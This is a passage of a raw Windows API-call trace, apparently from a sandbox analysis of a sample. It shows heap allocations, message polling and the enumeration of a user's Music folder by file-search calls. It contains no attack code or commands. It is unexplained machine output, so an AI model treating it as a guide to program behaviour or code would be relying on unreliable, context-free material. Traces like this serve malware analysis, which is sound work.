Size=0x10) returned 0x2e51058 [0243.668] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0243.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0243.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0243.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0243.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.668] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0243.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0243.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0243.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0243.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0243.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0243.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0243.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0243.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0243.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0243.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0243.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0243.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0243.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0243.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0243.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17) returned 0x2e69c08 [0243.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x2e69c08, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0243.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0243.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0243.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0243.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x59) returned 0x978490 [0243.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0243.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0243.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2e54dc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0243.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.670] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0243.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0243.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0243.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0243.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0243.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0243.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0243.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0243.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0243.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0243.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0243.671] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0243.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0243.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0243.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0243.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0243.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0243.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0243.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0243.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0243.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0243.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.672] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe711efdd, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe711efdd, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0xa86f90 [0243.672] FindNextFileW (in: hFindFile=0xa86f90, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe711efdd, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe711efdd, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0243.672] FindNextFileW (in: hFindFile=0xa86f90, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44131840, ftCreationTime.dwHighDateTime=0x1d5e7fa, ftLastAccessTime.dwLowDateTime=0xee597e70, ftLastAccessTime.dwHighDateTime=0x1d5efb1, ftLastWriteTime.dwLowDateTime=0xee597e70, ftLastWriteTime.dwHighDateTime=0x1d5efb1, nFileSizeHigh=0x0, nFileSizeLow=0x14dee, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="DePu.wav", cAlternateFileName="")) returned 1 [0243.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0243.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12) returned 0x2e69b48 [0243.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0243.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0243.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0243.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0243.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0243.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0243.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.673] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.673] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0243.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0243.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0243.673] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0243.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0243.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0243.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0243.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0243.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0243.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0243.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0243.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.674] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0243.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0243.674] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0243.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0243.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0243.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0243.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0243.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.674] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0243.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0243.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0243.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0243.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0243.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0243.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e280 [0243.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0243.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0243.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0243.675] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.675] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0243.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0243.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0243.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.675] FindNextFileW (in: hFindFile=0xa86f90, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0243.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0243.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0243.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0243.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0243.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0243.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0243.676] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0243.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.676] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0243.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0243.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0243.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0243.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0243.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0243.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0243.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0243.676] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0243.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0243.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0243.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0243.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0243.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0243.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0243.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0243.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.677] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0243.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0243.677] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0243.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0243.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0243.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0243.677] FindNextFileW (in: hFindFile=0xa86f90, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4cef09e0, ftCreationTime.dwHighDateTime=0x1d5ede7, ftLastAccessTime.dwLowDateTime=0x62573470, ftLastAccessTime.dwHighDateTime=0x1d5eada, ftLastWriteTime.dwLowDateTime=0x62573470, ftLastWriteTime.dwHighDateTime=0x1d5eada, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="glcTlwbAHh7KHPzW", cAlternateFileName="GLCTLW~1")) returned 1 [0243.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e6a8 [0243.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0243.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.678] HeapFree (in: hHeap=0x970000, 